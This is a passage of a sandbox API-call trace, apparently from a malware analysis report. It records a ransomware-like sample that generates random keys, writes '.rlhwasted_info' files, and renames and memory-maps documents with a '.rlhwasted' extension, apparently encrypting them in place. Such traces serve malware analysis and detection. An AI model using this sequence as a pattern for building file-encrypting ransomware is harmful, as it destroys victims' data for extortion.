(hProv=0x711070, dwFlags=0x0) returned 1 [0191.611] SetEndOfFile (hFile=0x104) returned 1 [0191.614] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0191.614] CloseHandle (hObject=0x104) returned 1 [0191.616] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0191.617] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0191.617] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0191.617] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0191.617] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Q8gKt VfQ-V.docx") returned 60 [0191.617] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x282) returned 0x6d4580 [0191.618] lstrcpyW (in: lpString1=0x6d45f8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0191.618] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0191.618] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0191.618] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0191.618] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0191.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Q8gKt VfQ-V.docx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\q8gkt vfq-v.docx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0191.619] WriteFile (in: hFile=0x104, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0191.620] SetEndOfFile (hFile=0x104) returned 1 [0191.620] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.620] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0191.620] lstrcpyW (in: lpString1=0x6d45f8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0191.620] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Q8gKt VfQ-V.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\q8gkt vfq-v.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Q8gKt VfQ-V.docx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\q8gkt vfq-v.docx.rlhwasted")) returned 1 [0191.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Q8gKt VfQ-V.docx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\q8gkt vfq-v.docx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0191.622] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0191.624] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0191.625] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0191.625] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0191.625] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0191.626] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0191.626] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0191.636] SetEndOfFile (hFile=0x104) returned 1 [0191.638] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0191.638] CloseHandle (hObject=0x104) returned 1 [0191.711] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0191.711] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0191.713] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0191.713] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0191.713] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QVqm2k.odp") returned 54 [0191.713] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x276) returned 0x6d4580 [0191.713] lstrcpyW (in: lpString1=0x6d45ec, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0191.713] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0191.713] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0191.714] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0191.714] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0191.714] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QVqm2k.odp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qvqm2k.odp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0191.952] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0191.953] SetEndOfFile (hFile=0x124) returned 1 [0191.953] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.954] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0191.954] lstrcpyW (in: lpString1=0x6d45ec, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0191.954] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QVqm2k.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qvqm2k.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QVqm2k.odp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qvqm2k.odp.rlhwasted")) returned 1 [0191.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QVqm2k.odp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qvqm2k.odp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0191.956] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0191.960] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0191.961] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0191.961] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0191.962] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0191.963] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0191.963] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0191.977] SetEndOfFile (hFile=0x124) returned 1 [0191.980] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0191.980] CloseHandle (hObject=0x124) returned 1 [0192.248] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0192.249] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0192.250] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0192.250] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.250] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RCql8j-X_chAhjoZaRm.pptx") returned 68 [0192.250] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x292) returned 0x6d4580 [0192.251] lstrcpyW (in: lpString1=0x6d4608, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0192.251] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0192.251] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0192.252] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0192.252] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RCql8j-X_chAhjoZaRm.pptx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rcql8j-x_chahjozarm.pptx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0192.253] WriteFile (in: hFile=0x104, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0192.255] SetEndOfFile (hFile=0x104) returned 1 [0192.255] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.255] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0192.255] lstrcpyW (in: lpString1=0x6d4608, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0192.256] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RCql8j-X_chAhjoZaRm.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rcql8j-x_chahjozarm.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RCql8j-X_chAhjoZaRm.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rcql8j-x_chahjozarm.pptx.rlhwasted")) returned 1 [0192.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RCql8j-X_chAhjoZaRm.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rcql8j-x_chahjozarm.pptx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0192.258] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0192.259] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0192.260] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0192.261] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.261] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0192.262] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0192.262] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.274] SetEndOfFile (hFile=0x104) returned 1 [0192.281] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0192.281] CloseHandle (hObject=0x104) returned 1 [0192.288] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0192.289] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0192.290] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0192.290] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.290] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\s4uwwYdKTVgb2.pdf") returned 61 [0192.290] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x284) returned 0x6d4580 [0192.291] lstrcpyW (in: lpString1=0x6d45fa, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0192.291] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0192.291] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0192.292] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0192.293] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\s4uwwYdKTVgb2.pdf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s4uwwydktvgb2.pdf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0192.294] WriteFile (in: hFile=0x104, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0192.361] SetEndOfFile (hFile=0x104) returned 1 [0192.361] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.361] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0192.361] lstrcpyW (in: lpString1=0x6d45fa, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0192.361] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\s4uwwYdKTVgb2.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s4uwwydktvgb2.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\s4uwwYdKTVgb2.pdf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s4uwwydktvgb2.pdf.rlhwasted")) returned 1 [0192.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\s4uwwYdKTVgb2.pdf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s4uwwydktvgb2.pdf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0192.391] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0192.392] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0192.458] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0192.458] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.459] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0192.460] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0192.460] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.472] SetEndOfFile (hFile=0x104) returned 1 [0192.475] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0192.475] CloseHandle (hObject=0x104) returned 1 [0192.480] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0192.481] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0192.482] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0192.482] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.482] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vm9oM4.pptx") returned 55 [0192.482] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x278) returned 0x6e8b80 [0192.482] lstrcpyW (in: lpString1=0x6e8bee, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0192.482] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0192.482] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0192.483] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0192.483] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vm9oM4.pptx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vm9om4.pptx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0192.484] WriteFile (in: hFile=0x104, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0192.485] SetEndOfFile (hFile=0x104) returned 1 [0192.486] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.486] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0192.486] lstrcpyW (in: lpString1=0x6e8bee, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0192.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vm9oM4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vm9om4.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vm9oM4.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vm9om4.pptx.rlhwasted")) returned 1 [0192.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vm9oM4.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vm9om4.pptx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0192.487] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0192.489] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0192.490] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0192.490] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.490] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0192.491] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0192.491] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.541] SetEndOfFile (hFile=0x104) returned 1 [0192.544] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0192.544] CloseHandle (hObject=0x104) returned 1 [0192.551] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8b80 | out: hHeap=0x6b0000) returned 1 [0192.551] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0192.552] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0192.552] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.552] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WN0SSOF-CKIdtng.docx") returned 64 [0192.552] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28a) returned 0x6d4580 [0192.552] lstrcpyW (in: lpString1=0x6d4600, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0192.552] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0192.552] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0192.553] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0192.554] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WN0SSOF-CKIdtng.docx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wn0ssof-ckidtng.docx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0192.555] WriteFile (in: hFile=0x104, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0192.556] SetEndOfFile (hFile=0x104) returned 1 [0192.556] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.556] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0192.556] lstrcpyW (in: lpString1=0x6d4600, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0192.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WN0SSOF-CKIdtng.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wn0ssof-ckidtng.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WN0SSOF-CKIdtng.docx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wn0ssof-ckidtng.docx.rlhwasted")) returned 1 [0192.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WN0SSOF-CKIdtng.docx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wn0ssof-ckidtng.docx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0192.557] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0192.560] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 